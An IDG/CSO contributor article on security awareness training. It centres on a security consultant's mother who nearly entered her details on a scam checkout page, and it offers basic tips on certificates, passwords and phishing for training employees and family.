Security awareness: Training moms and end users to spot a scam

Why awareness training is important for securing the enterprise and your extended network of friends and family.

Char Yarema is of the generation of parents who did not grow up using technology, so her son, Jonathan Yarema, security consultant at Trustwave, has impressed upon her the importance of using caution and patience when surfing the web. Jon wrote about his mom’s experience in his SpiderLabs blog post, and I had the chance to talk with the security duo to learn more about their story.

Char reminded me a lot of my own parents, who love the convenience and expansiveness of using the Internet but also fail to understand the potential threats that constantly lurk behind a computer screen. Just a few weeks ago, I received what was clearly a spam mail from my father. I called him to let him know that his email had likely been compromised as I had received said email with a subject that my dad would never have written. “What did the email say?” he asked.

I explained that I didn’t open it and that he needed to change his password immediately and the passwords of all other online accounts.

My dad is a retired general contractor, and at 69 years old, the Internet has always been a source of entertainment. Like many folks his age, he doesn’t understand the criminal activity that he can easily fall victim to, most likely because he’s never been trained to look for suspicious behavior.

Char Yarema has, though. Before Christmas she had called up a store to place an order and learned that the free shipping was only available to online shoppers. “I called because I like to talk to someone. I knew that it said free shipping online, but with the gal it was $12. She explained that it was only free online, so I went back to the computer,” Yarema said.

It was her first online shopping experience and she navigated through the process with relative ease, clicking the item she wanted and arriving at the point that they wanted her name and all the vital information. “I entered all of the information, and the next step was to place the order, but I heard this inner voice—probably Jon’s voice—saying ‘check for the lock’” said Yarema. She didn’t see it and wasn’t sure if it should have shown up before this point in her checkout, so she decided to call her son.

“I said, just wait and talk to Jon because I didn’t know if it was only the lock I should be looking for. I texted him, and he said not to do anything right now and that he’d check it out when he got to work,” Yarema said.

“Well, I got a message from him, he was practically shouting at me in capital letters—DO NOT PLACE THAT ORDER,” Yarema said. Unfortunately, the scam was sophisticated enough to have an event from field to field that took everything entered into the form so that they got the data even though she hadn’t hit the submit button.

As so many of the employees represented in today’s work force encompass those ranging from recent college graduates to soon-to-be-retired, the average enterprise will have end users who are much like my dad and Jon’s mom. “We enjoy the technology but it’s kind of a love-hate relationship. Having a computer at home is like having a library in your dining room, but sometimes it scares me. Yet, it’s such a great invention that I’m drawn back into it.”

So for all of those who are entering into the information security or cyber security industry, understanding who your end users are and what their level of comfort and threat awareness is will inform the types of training programs you need to implement to best defend your expanded networks.

Jonathan Yarema said, “One of the things that we’ve always looked at is certificates when you’re using a web browser. If you get that untrusted web sign, don’t go any further. Bring that to an administrator.”

Other topics you want to emphasize in training employees about cyber hygiene include password complexity and where they are stored, spam attacks, and spear phishing. Jonathan Yarema said, “Email comes through and it looks like it’s from someone else in the organization. Knowing what the roles are and who the players are is key, especially for new people. Sometimes security is just starting to see the attack vectors.”

Whether training employees, family, or friends about cyber security, Jonathan Yarema said, “Under normal circumstances you should see a certificate." In dealing with any person, "You should never be asked for a password.” Ensuring that your employees keep these tips in mind will help to protect the enterprise.

This article is published as part of the IDG Contributor Network.

Join the CSO newsletter!

Error: Please check your email address.

Tags securitysecurity awarenessCSO Australiasocial engineering

More about IDGTrustwave

Show Comments

Featured Whitepapers

Editor's Recommendations

Solution Centres

Stories by Kacy Zurkus

Latest Videos

  • 150x50

    CSO Webinar: Will your data protection strategy be enough when disaster strikes?

    Speakers: - Paul O’Connor, Engagement leader - Performance Audit Group, Victorian Auditor-General’s Office (VAGO) - Nigel Phair, Managing Director, Centre for Internet Safety - Joshua Stenhouse, Technical Evangelist, Zerto - Anthony Caruana, CSO MC & Moderator

    Play Video

  • 150x50

    CSO Webinar: The Human Factor - Your people are your biggest security weakness

    ​Speakers: David Lacey, Researcher and former CISO Royal Mail David Turner - Global Risk Management Expert Mark Guntrip - Group Manager, Email Protection, Proofpoint

    Play Video

  • 150x50

    CSO Webinar: Current ransomware defences are failing – but machine learning can drive a more proactive solution

    Speakers • Ty Miller, Director, Threat Intelligence • Mark Gregory, Leader, Network Engineering Research Group, RMIT • Jeff Lanza, Retired FBI Agent (USA) • Andy Solterbeck, VP Asia Pacific, Cylance • David Braue, CSO MC/Moderator What to expect: ​Hear from industry experts on the local and global ransomware threat landscape. Explore a new approach to dealing with ransomware using machine-learning techniques and by thinking about the problem in a fundamentally different way. Apply techniques for gathering insight into ransomware behaviour and find out what elements must go into a truly effective ransomware defence. Get a first-hand look at how ransomware actually works in practice, and how machine-learning techniques can pick up on its activities long before your employees do.

    Play Video

  • 150x50

    CSO Webinar: Get real about metadata to avoid a false sense of security

    Speakers: • Anthony Caruana – CSO MC and moderator • Ian Farquhar, Worldwide Virtual Security Team Lead, Gigamon • John Lindsay, Former CTO, iiNet • Skeeve Stevens, Futurist, Future Sumo • David Vaile - Vice chair of APF, Co-Convenor of the Cyberspace Law And Policy Community, UNSW Law Faculty This webinar covers: - A 101 on metadata - what it is and how to use it - Insight into a typical attack, what happens and what we would find when looking into the metadata - How to collect metadata, use this to detect attacks and get greater insight into how you can use this to protect your organisation - Learn how much raw data and metadata to retain and how long for - Get a reality check on how you're using your metadata and if this is enough to secure your organisation

    Play Video

  • 150x50

    CSO Webinar: How banking trojans work and how you can stop them

    CSO Webinar: How banking trojans work and how you can stop them Featuring: • John Baird, Director of Global Technology Production, Deutsche Bank • Samantha Macleod, GM Cyber Security, ME Bank • Sherrod DeGrippo, Director of Emerging Threats, Proofpoint (USA)

    Play Video

More videos

Blog Posts

Market Place